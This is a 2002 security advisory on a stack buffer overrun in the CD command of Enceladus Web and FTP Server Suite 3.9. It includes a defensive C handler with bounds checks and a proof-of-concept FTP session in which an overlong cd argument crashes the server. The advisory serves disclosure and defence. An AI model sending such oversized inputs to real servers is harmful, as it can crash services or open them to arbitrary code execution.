Reported November 26, 2002, by Tamer Sahin.

VERSIONS AFFECTED

  • Enceladus Web and FTP Server Suite Version 3.9

DESCRIPTION

A buffer overrun vulnerability in Enceladus Web and FTP Server Suite Version 3.9 can permit an attacker to execute arbitrary code on the vulnerable system. If an attacker supplies a long sequence of characters as an argument to the CD command, thereby exceeding the length of the input buffer, the excess data will overwrite other variables on the stack and the stack frame. Execution of arbitrary code can result from this scenario. For more specific details about this vulnerability, see the discoverer's Web site.
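The pattern behind the advisory is an argument copied into a fixed-size stack buffer without a length check. The following handler is an added example, not code from the advisory or from Mollensoft, showing the bounded form a server should use: the argument length is measured against the buffer size before anything is copied, and an oversized request is rejected with the buffer left untouched. The buffer size (256), the function and enum names, and the choice to accept both "CD" and the wire spelling "CWD" are assumptions made for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Size of the server's working-directory buffer. Assumed for this example,
 * not a value taken from the advisory. */
#define CWD_BUF_SIZE 256

enum cd_result {
    CD_OK = 0,        /* argument accepted and copied into cwd */
    CD_NOT_CD,        /* the line is some other command */
    CD_EMPTY,         /* no argument supplied */
    CD_TOO_LONG       /* argument would not fit; rejected, cwd unchanged */
};

/* Length of the argument up to CR, LF or NUL, scanning at most `cap` bytes
 * so an unterminated input can never drive the scan past what we accept. */
static size_t arg_len(const char *s, size_t cap) {
    size_t n = 0;
    while (n < cap && s[n] != '\0' && s[n] != '\r' && s[n] != '\n')
        n++;
    return n;
}

/* Bounded handler for a control-channel line such as "CD pub\r\n".
 * On CD_OK, `cwd` holds the NUL-terminated argument; on any error it is
 * left exactly as it was. The unchecked alternative (strcpy/sprintf of the
 * argument into cwd) is the defect class the advisory describes. */
enum cd_result handle_cd_line(const char *line, char *cwd, size_t cwd_size) {
    char verb[8];
    size_t i = 0, len;

    /* Extract and uppercase the verb; FTP verbs are case-insensitive. */
    while (i < sizeof verb - 1 && line[i] != '\0' &&
           !isspace((unsigned char)line[i])) {
        verb[i] = (char)toupper((unsigned char)line[i]);
        i++;
    }
    verb[i] = '\0';
    /* The client's "cd" is sent on the wire as CWD; accept both (assumption). */
    if (strcmp(verb, "CD") != 0 && strcmp(verb, "CWD") != 0)
        return CD_NOT_CD;

    while (line[i] == ' ')
        i++;
    len = arg_len(line + i, cwd_size);
    if (len == 0)
        return CD_EMPTY;
    if (len >= cwd_size)          /* no room for the terminator: reject */
        return CD_TOO_LONG;
    memcpy(cwd, line + i, len);   /* len < cwd_size, so this cannot overrun */
    cwd[len] = '\0';
    return CD_OK;
}

int main(void) {
    char cwd[CWD_BUF_SIZE] = "/";
    char oversized[3 + 600 + 3];

    /* Constructed oversized request: "CD " followed by 600 filler bytes. */
    memcpy(oversized, "CD ", 3);
    memset(oversized + 3, 'A', 600);
    memcpy(oversized + 603, "\r\n", 3);

    printf("short request -> %d, cwd=%s\n",
           handle_cd_line("cd pub\r\n", cwd, sizeof cwd), cwd);
    printf("long request  -> %d, cwd=%s\n",
           handle_cd_line(oversized, cwd, sizeof cwd), cwd);
    return 0;
}
```

The check is on the argument's length relative to the destination, not on the command's total length, so it holds regardless of how the line was received. Returning a distinct code for the oversized case also gives the server something to log, which is the signal a monitoring rule would key on.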

DEMONSTRATION

The discoverer posted the following session as proof of concept:

ts@metacortex:~$ ftp 192.168.10.2
Connected to 192.168.10.2.
220 Mollensoft FTP Server Ready.
Name (192.168.10.2:ts): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
500 'EPSV': command not understood.
227 Entering Passive Mode (192,168,10,2,6,160)
150 Data connection open for PASV transfer.
-rwxr-xr-x 1 User Group 6468 Feb 17 01:13 index.html
-rwxr-xr-x 1 User Group 70 Oct 31 04:52 readme.txt
226 Listing complete.
ftp> cd
@@@
421 Service not available, remote server has closed connection.

VENDOR RESPONSE

Mollensoft Software has been notified but hasn't yet released a patch for this problem.

CREDIT

Discovered by Tamer Sahin.